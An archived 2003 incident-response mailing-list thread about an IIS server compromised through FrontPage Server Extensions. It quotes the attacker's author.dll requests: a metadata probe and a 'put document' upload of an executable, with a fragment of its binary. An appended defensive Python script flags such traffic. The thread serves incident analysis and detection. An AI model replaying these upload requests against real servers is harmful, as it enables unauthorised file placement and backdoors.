Re: frontpage extensions; backdoor or initial compromise?

From: Tri Huynh (trihuynhat_private)
Date: Thu Jul 03 2003 - 23:50:57 PDT


    It is not WebDAV at all. It looks like you don't set up the permissions for
    your FPSE correctly and allow anybody to run the author page. Hope that helps.
    
    Tri Huynh
    SentryUnion
    
    
    ----- Original Message -----
    From: "Eric Kimminau" <rootat_private>
    To: "Jordan Wiens" <jwiensat_private>
    Cc: <incidentsat_private>
    Sent: Thursday, July 03, 2003 11:05 AM
    Subject: Re: frontpage extensions; backdoor or initial compromise?
    
    
    > I'm assuming it was WebDAV, right? Get your Windows boxes patched and
    > keep close tabs on them on Sunday.
    >
    > Eric.
    >
    >
    > On Wed, 2 Jul 2003, Jordan Wiens wrote:
    >
    > > Date: Wed, 2 Jul 2003 13:08:43 -0400 (EDT)
    > > From: Jordan Wiens <jwiensat_private>
    > > To: incidentsat_private
    > > Subject: frontpage extensions; backdoor or initial compromise?
    > >
    > > We had a recent compromise that our IDS did not detect, however, it did
    > > detect subsequent backdoor activity and a few other packets afterwards
    > > that alerted us to the compromise.  Upon closer investigation of the
    > > activity, some of the additional information logged showed some frontpage
    > > extensions being used in an interesting way.  Anyone else seen this?
    > >
    > > Since we were unable to determine the initial compromise method, I'm
    > > trying to figure out if this was purely used as a backdoor, or might also
    > > have been the same method as the initial compromise.
    > >
    > > Some additional background info; the svchost.exe is a renamed servu ftp
    > > daemon process that was loaded into the server along with a few other,
    > > 'normal' backdoor tools.
    > >
    > > --
    > > Jordan Wiens
    > > UF Network Incident Response Team
    > > (352)392-2061
    > >
    > > ATTACK:
    > > ---------------
    > > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > > Date: Tue, 01 Jul 2003 20:33:10 GMT
    > > MIME-Version: 1.0
    > > User-Agent: MSFrontPage/4.0
    > > Host: aaa.bbb.ccc.ddd
    > > Accept: auth/sicily
    > > Content-Length: 112
    > > Content-Type: application/x-www-form-urlencoded
    > > X-Vermeer-Content-Type: application/x-www-form-urlencoded
    > > Connection: Keep-Alive
    > > Cache-Control: no-cache
    > >
    > >
    > > method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&listHiddenDocs=false&listLinkInfo=true
    > >
    > >
    > > SERVER RESPONSE:
    > > ---------------
    > > HTTP/1.1 100 Continue
    > > Server: Microsoft-IIS/5.0
    > > Date: Tue, 01 Jul 2003 20:30:02 GMT
    > >
    > > HTTP/1.1 200 OK
    > > Server: Microsoft-IIS/5.0
    > > Date: Tue, 01 Jul 2003 20:30:02 GMT
    > > Connection: close
    > > Content-type: application/x-vermeer-rpc
    > > X-FrontPage-User-Name: IUSR_MACHINE
    > >
    > > <html><head><title>vermeer RPC packet</title></head>
    > > <body>
    > > <p>method=getDocsMetaInfo:4.0.2.4715
    > > <p>document_list=
    > > <ul>
    > > </ul>
    > > <p>failedUrls=
    > > <ul>
    > > <li>svchost.exe
    > > </ul>
    > > </body>
    > > </html>
    > >
    > >
    > >
    > > Additional session....
    > >
    > > ATTACKER:
    > > ---------------
    > > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > > Date: Tue, 01 Jul 2003 20:33:29 GMT
    > > MIME-Version: 1.0
    > > User-Agent: MSFrontPage/4.0
    > > Host: aaa.bbb.ccc.ddd
    > > Accept: auth/sicily
    > > Content-Length: 2142969
    > > Content-Type: application/x-vermeer-urlencoded
    > > X-Vermeer-Content-Type: application/x-vermeer-urlencoded
    > > Connection: Keep-Alive
    > > Cache-Control: no-cache
    > >
    > >
    > > SERVER:
    > > ---------------
    > > HTTP/1.1 100 Continue
    > > Server: Microsoft-IIS/5.0
    > > Date: Tue, 01 Jul 2003 20:30:21 GMT
    > >
    > > ATTACKER:
    > > ---------------
    > >
    > > method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dsvss%2eexe%3bmeta%5finfo%3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fchecked%5fout=false
    > > MZP@!L!This program must be run under Win32
    > > $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata
    > > .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS
    > > htM=[s
    > > .
    > > . Additional raw data.
    > > .
    > >
    >
    > > --------------------------------------------------------------------------
    > > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    > > world's premier technical IT security event! 10 tracks, 15 training sessions,
    > > 1,800 delegates from 30 nations including all of the top experts, from CSO's to
    > > "underground" security specialists.  See for yourself what the buzz is about!
    > > Early-bird registration ends July 3.  This event will sell out. www.blackhat.com
    > > --------------------------------------------------------------------------
    
    
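A defender-side triage script for the author.dll traffic discussed in this thread, added here as an example and not code from any of the posters: it decodes the url-encoded "vermeer RPC" bodies quoted above and flags content-writing methods, executable uploads, and authoring calls that the server answered for an anonymous IUSR_ account (the permission problem Tri Huynh points at). The sample exchanges are constructed from the thread's capture; for the upload call only the "100 Continue" was quoted, so its response headers are assumed empty.

```python
"""Triage FPSE author.dll exchanges (added example, not from the thread).
Decodes the url-encoded "vermeer RPC" POST bodies shown in the thread and flags
content-writing calls, executable uploads, and authoring answered for an
anonymous IUSR_ account (the misconfiguration Tri Huynh points at)."""

import re
from urllib.parse import parse_qs

AUTHOR_DLL = "/_vti_bin/_vti_aut/author.dll"
# FPSE RPC methods that change content on the server (names as sent on the wire).
WRITE_METHODS = {"put document", "remove documents", "move document", "create url-directories"}
EXEC_EXT = re.compile(r"\.(exe|dll|com|bat|cmd|vbs|asp)$", re.I)

def parse_rpc_body(body: str) -> dict:
    """Decode a vermeer RPC body; adds method_name, method_version, document_name."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    name, _, version = fields.get("method", "").partition(":")
    fields["method_name"], fields["method_version"] = name, version
    # document=[document_name=svss.exe;meta_info=[...]] -> file name being written
    m = re.search(r"document_name=([^;\]]+)", fields.get("document", ""))
    fields["document_name"] = m.group(1) if m else ""
    return fields

def assess(path: str, body: str, response_headers: dict) -> list:
    """Return findings (strings) for one request/response pair; [] if nothing stands out."""
    if not path.startswith(AUTHOR_DLL):
        return []
    rpc = parse_rpc_body(body)
    user = response_headers.get("X-FrontPage-User-Name", "")
    anonymous = user.upper().startswith("IUSR_")   # IIS anonymous account prefix
    findings = []
    if rpc["method_name"] in WRITE_METHODS:
        findings.append(f"write method '{rpc['method_name']}' via author.dll")
        if EXEC_EXT.search(rpc["document_name"]):
            findings.append(f"executable written: {rpc['document_name']}")
    if anonymous:
        findings.append(f"author.dll served anonymous account {user} ({rpc['method_name']})")
    return findings

# Constructed from the thread's capture: recon call with its response headers, then the upload.
RECON_BODY = ("method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d"
              "&listHiddenDocs=false&listLinkInfo=true")
UPLOAD_BODY = ("method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5f"
               "name%3dsvss%2eexe%3bmeta%5finfo%3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3b"
               "vti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fchecked%5fout=false")
RECON_RESPONSE = {"Server": "Microsoft-IIS/5.0", "X-FrontPage-User-Name": "IUSR_MACHINE"}

if __name__ == "__main__":
    for finding in assess(AUTHOR_DLL, RECON_BODY, RECON_RESPONSE) + assess(AUTHOR_DLL, UPLOAD_BODY, {}):
        print("ALERT:", finding)
```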
    



    This archive was generated by hypermail 2b30 : Sat Jul 05 2003 - 10:27:39 PDT